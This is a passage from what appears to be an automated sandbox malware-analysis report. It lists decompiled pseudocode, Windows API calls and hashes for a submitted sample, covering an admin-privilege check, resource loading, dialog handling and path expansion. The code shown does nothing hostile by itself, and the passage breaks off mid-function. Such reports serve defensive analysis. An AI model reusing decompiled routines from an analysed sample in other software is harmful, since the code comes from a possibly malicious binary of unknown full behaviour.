                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 001F317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 001F3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 001F3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,001F30C0), ref: 001F31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001F31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 3785188418-3940384054
                                                                                                                                                                                                        • Opcode ID: 967dce6e63ab32c142abf76894029c8c61b0bdf0fdf5691e97dcdeef2a715820
                                                                                                                                                                                                        • Instruction ID: 9e5608f80a4eaf189795f9d2339a37f860c6af16e377028d940bc980e29fbe5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 967dce6e63ab32c142abf76894029c8c61b0bdf0fdf5691e97dcdeef2a715820
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4411D37124C219BBDB116F24DC0CBBA3A64FF4A720F514611FA2A919E0DB799681C742
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E001F18A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0x1f8128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E001F6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E001F17EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0x1f8128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f8128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001F18DD), ref: 001F181A
                                                                                                                                                                                                          • Part of subcall function 001F17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001F182C
                                                                                                                                                                                                          • Part of subcall function 001F17EE: AllocateAndInitializeSid.ADVAPI32(001F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001F18DD), ref: 001F1855
                                                                                                                                                                                                          • Part of subcall function 001F17EE: FreeSid.ADVAPI32(?,?,?,?,001F18DD), ref: 001F1883
                                                                                                                                                                                                          • Part of subcall function 001F17EE: FreeLibrary.KERNEL32(00000000,?,?,?,001F18DD), ref: 001F188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001F18EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 001F18F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 001F190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 001F1918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 001F192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 001F1944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001F1964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 001F197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 001F199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F19A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F19AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E001F17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0x1fa288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001F18DD), ref: 001F181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001F182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(001F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001F18DD), ref: 001F1855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,001F18DD), ref: 001F1883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,001F18DD), ref: 001F188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: c7c0c9be2ca68e1153bb09e018ef6a2ad5efc84d1e5e86cc7fb74777fae9ddff
                                                                                                                                                                                                        • Instruction ID: 9a57f4f662bbe1fe721452dd02e361fa8ae708c879994336f4a0970ddc253938
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7c0c9be2ca68e1153bb09e018ef6a2ad5efc84d1e5e86cc7fb74777fae9ddff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE116371E00209FBDB109FA4EC49ABEBBB8EF48751F500169FA06E2290DF759D45CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E001F43D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0x1f9404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x1f91dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 001F3490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 001F349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 001F34B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 001F34C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 001F34CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 001F34D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: e40744d72af8542e1844bc19e4d8842eac0ae2b880bbc5c7be23b53388a912c9
                                                                                                                                                                                                        • Instruction ID: 10fe7e6976e10ecc6ba522591c82d1fb1ecc81670b6c34f2565d4639f6bc0214
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40744d72af8542e1844bc19e4d8842eac0ae2b880bbc5c7be23b53388a912c9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F01B17124811CABC71A6F64DC1C97E3A64FF45710F414020FB6A86AA0CB349F92DB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0x1f9a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F1680(_t65, E001F17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E001F65E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E001F1680(_t65, E001F17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 001F2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 001F2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 001F2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 001F2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 001F2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 001F2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: a2974eb6f205937d9fc84d938051a3eea8fc23165c72355307450cb02cd78064
                                                                                                                                                                                                        • Instruction ID: 85d9feb215720b351e0b0463a266ba034455ed9acaade5e3128031f0854c9f3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2974eb6f205937d9fc84d938051a3eea8fc23165c72355307450cb02cd78064
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F04167741082499FDB259F308C54AFD7BA99F56310F0400DAEDC683602DF798E86CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
